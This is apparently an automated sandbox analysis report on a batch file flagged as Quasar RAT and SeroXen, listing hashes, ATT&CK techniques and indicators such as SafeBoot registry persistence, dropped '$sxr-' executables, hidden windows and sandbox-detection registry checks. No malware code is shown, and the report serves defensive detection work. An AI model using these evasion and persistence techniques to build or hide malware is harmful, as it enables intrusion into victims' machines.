quasar | 5bec7bb0fc081360633e5082b4f0f3eb35d3d875c89f854aa694ab19890e544c

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250207-en
resource tags

arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
submitted
12-02-2025 05:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

15.5MB
MD5

9785193adfcf2b7888f90d0fe16e7f46
SHA1

cd5120c0662c0572b1973f9fd9f79566ac181935
SHA256

5bec7bb0fc081360633e5082b4f0f3eb35d3d875c89f854aa694ab19890e544c
SHA512

04c2c70fc2e02f04ae777cef1e85d949b1091f16650e50481e523ecf81e7ca0efc1a5991583e25b0e0657f7264e0264339d49acfe94229d58c636c9ca003e325
SSDEEP

49152:eCDQpWIFvGGPXy9Vj9n2Oktv5kdUrmm/359AiKai7JEenmZTzNwzlLLy0HMUpEMC:O

Score

10^/10

quasar seroxen defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/2956-78-0x0000017CFC830000-0x0000017CFCFDE000-memory.dmp	family_quasar

Seroxen family
seroxen
Seroxen, Ser0xen
Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.
trojan seroxen

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4424 created 5080	4424	svchost.exe	104
PID 4424 created 1596	4424	svchost.exe	109

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3152	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-194335498-2604837297-537231065-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Deletes itself 1 IoCs

pid	Process
3152	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2052	$sxr-mshta.exe
1912	$sxr-cmd.exe
2956	$sxr-powershell.exe
3240	$sxr-powershell.exe

Impair Defenses: Safe Mode Boot 1 TTPs 64 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BcastDVRUserService	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PcaSvc\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pcmcia	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pcw	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SNMPTRAP\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\srvnet	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UcmUcsiCx0101\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ALG	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MsLldp\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MsRPC	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NcbService\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAuto	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ServiceModelEndpoint 3.0.0.0\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UdeCx\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UevAgentService\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CmBatt\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\condrv\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Fs_Rec\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\intelpmax\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MRxDAV	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UcmUcsiAcpiClient	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmicrdv	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\.NET CLR Data	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\COMSysApp\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidinterrupt\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ndisuio\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wmiApSrv\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\FDResPub\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MessagingService\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TroubleshootingSvc	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\bttflt	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LSI_SSS\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\netprofm	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NlaSvc	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vsmraid	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\GpuEnergyDrv\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ndisuio	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nsiproxy	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\spaceparser\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\xmlprov\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CimFS\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaStorV\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mvumis	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SharedRealitySvc\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\storahci	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\VerifierExt	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpdUpFltr\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\camsvc\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ntfs\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pciide	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PimIndexMaintenanceSvc\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Vid\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\XboxGipSvc	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AssignedAccessManagerSvc	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DXGKrnl	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hvservice\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SDFRd	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpnUserService_283cd	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\adsi\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\IPMIDRV\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mouhid	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tsusbhub	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PerfDisk	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
4528	$sxr-cmd.exe

Hide Artifacts: Hidden Window 1 TTPs 3 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4528	$sxr-cmd.exe
3240	$sxr-powershell.exe
2956	$sxr-powershell.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2340	MicrosoftEdgeUpdate.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1739337000"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 12 Feb 2025 05:10:01 GMT"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={30D0C1D1-0382-4E0E-8B5A-AC3DA4F696AE}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
3152	powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe
2956	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	2956	$sxr-powershell.exe
Token: SeDebugPrivilege	2956	$sxr-powershell.exe
Token: SeDebugPrivilege	2956	$sxr-powershell.exe
Token: SeShutdownPrivilege	3480	Explorer.EXE
Token: SeCreatePagefilePrivilege	3480	Explorer.EXE
Token: SeDebugPrivilege	3240	$sxr-powershell.exe
Token: SeShutdownPrivilege	3480	Explorer.EXE
Token: SeCreatePagefilePrivilege	3480	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	1988	svchost.exe
Token: SeIncreaseQuotaPrivilege	1988	svchost.exe
Token: SeSecurityPrivilege	1988	svchost.exe
Token: SeTakeOwnershipPrivilege	1988	svchost.exe
Token: SeLoadDriverPrivilege	1988	svchost.exe
Token: SeSystemtimePrivilege	1988	svchost.exe
Token: SeBackupPrivilege	1988	svchost.exe
Token: SeRestorePrivilege	1988	svchost.exe
Token: SeShutdownPrivilege	1988	svchost.exe
Token: SeSystemEnvironmentPrivilege	1988	svchost.exe
Token: SeUndockPrivilege	1988	svchost.exe
Token: SeManageVolumePrivilege	1988	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1988	svchost.exe
Token: SeIncreaseQuotaPrivilege	1988	svchost.exe
Token: SeSecurityPrivilege	1988	svchost.exe
Token: SeTakeOwnershipPrivilege	1988	svchost.exe
Token: SeLoadDriverPrivilege	1988	svchost.exe
Token: SeSystemtimePrivilege	1988	svchost.exe
Token: SeBackupPrivilege	1988	svchost.exe
Token: SeRestorePrivilege	1988	svchost.exe
Token: SeShutdownPrivilege	1988	svchost.exe
Token: SeSystemEnvironmentPrivilege	1988	svchost.exe
Token: SeUndockPrivilege	1988	svchost.exe
Token: SeManageVolumePrivilege	1988	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1988	svchost.exe
Token: SeIncreaseQuotaPrivilege	1988	svchost.exe
Token: SeSecurityPrivilege	1988	svchost.exe
Token: SeTakeOwnershipPrivilege	1988	svchost.exe
Token: SeLoadDriverPrivilege	1988	svchost.exe
Token: SeSystemtimePrivilege	1988	svchost.exe
Token: SeBackupPrivilege	1988	svchost.exe
Token: SeRestorePrivilege	1988	svchost.exe
Token: SeShutdownPrivilege	1988	svchost.exe
Token: SeSystemEnvironmentPrivilege	1988	svchost.exe
Token: SeUndockPrivilege	1988	svchost.exe
Token: SeManageVolumePrivilege	1988	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1988	svchost.exe
Token: SeIncreaseQuotaPrivilege	1988	svchost.exe
Token: SeSecurityPrivilege	1988	svchost.exe
Token: SeTakeOwnershipPrivilege	1988	svchost.exe
Token: SeLoadDriverPrivilege	1988	svchost.exe
Token: SeSystemtimePrivilege	1988	svchost.exe
Token: SeBackupPrivilege	1988	svchost.exe
Token: SeRestorePrivilege	1988	svchost.exe
Token: SeShutdownPrivilege	1988	svchost.exe
Token: SeSystemEnvironmentPrivilege	1988	svchost.exe
Token: SeUndockPrivilege	1988	svchost.exe
Token: SeManageVolumePrivilege	1988	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1988	svchost.exe
Token: SeIncreaseQuotaPrivilege	1988	svchost.exe
Token: SeSecurityPrivilege	1988	svchost.exe
Token: SeTakeOwnershipPrivilege	1988	svchost.exe
Token: SeLoadDriverPrivilege	1988	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2956	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 4236	4532	cmd.exe	90
PID 4532 wrote to memory of 4236	4532	cmd.exe	90
PID 4532 wrote to memory of 3152	4532	cmd.exe	91
PID 4532 wrote to memory of 3152	4532	cmd.exe	91
PID 2052 wrote to memory of 1912	2052	$sxr-mshta.exe	94
PID 2052 wrote to memory of 1912	2052	$sxr-mshta.exe	94
PID 1912 wrote to memory of 4408	1912	$sxr-cmd.exe	96
PID 1912 wrote to memory of 4408	1912	$sxr-cmd.exe	96
PID 1912 wrote to memory of 2956	1912	$sxr-cmd.exe	97
PID 1912 wrote to memory of 2956	1912	$sxr-cmd.exe	97
PID 2956 wrote to memory of 672	2956	$sxr-powershell.exe	7
PID 2956 wrote to memory of 672	2956	$sxr-powershell.exe	7
PID 2956 wrote to memory of 964	2956	$sxr-powershell.exe	12
PID 2956 wrote to memory of 964	2956	$sxr-powershell.exe	12
PID 2956 wrote to memory of 468	2956	$sxr-powershell.exe	14
PID 2956 wrote to memory of 468	2956	$sxr-powershell.exe	14
PID 2956 wrote to memory of 1040	2956	$sxr-powershell.exe	16
PID 2956 wrote to memory of 1040	2956	$sxr-powershell.exe	16
PID 2956 wrote to memory of 1060	2956	$sxr-powershell.exe	17
PID 2956 wrote to memory of 1060	2956	$sxr-powershell.exe	17
PID 2956 wrote to memory of 1124	2956	$sxr-powershell.exe	18
PID 2956 wrote to memory of 1124	2956	$sxr-powershell.exe	18
PID 2956 wrote to memory of 1160	2956	$sxr-powershell.exe	19
PID 2956 wrote to memory of 1160	2956	$sxr-powershell.exe	19
PID 2956 wrote to memory of 1188	2956	$sxr-powershell.exe	20
PID 2956 wrote to memory of 1188	2956	$sxr-powershell.exe	20
PID 2956 wrote to memory of 1276	2956	$sxr-powershell.exe	21
PID 2956 wrote to memory of 1276	2956	$sxr-powershell.exe	21
PID 2956 wrote to memory of 1316	2956	$sxr-powershell.exe	22
PID 2956 wrote to memory of 1316	2956	$sxr-powershell.exe	22
PID 2956 wrote to memory of 1328	2956	$sxr-powershell.exe	23
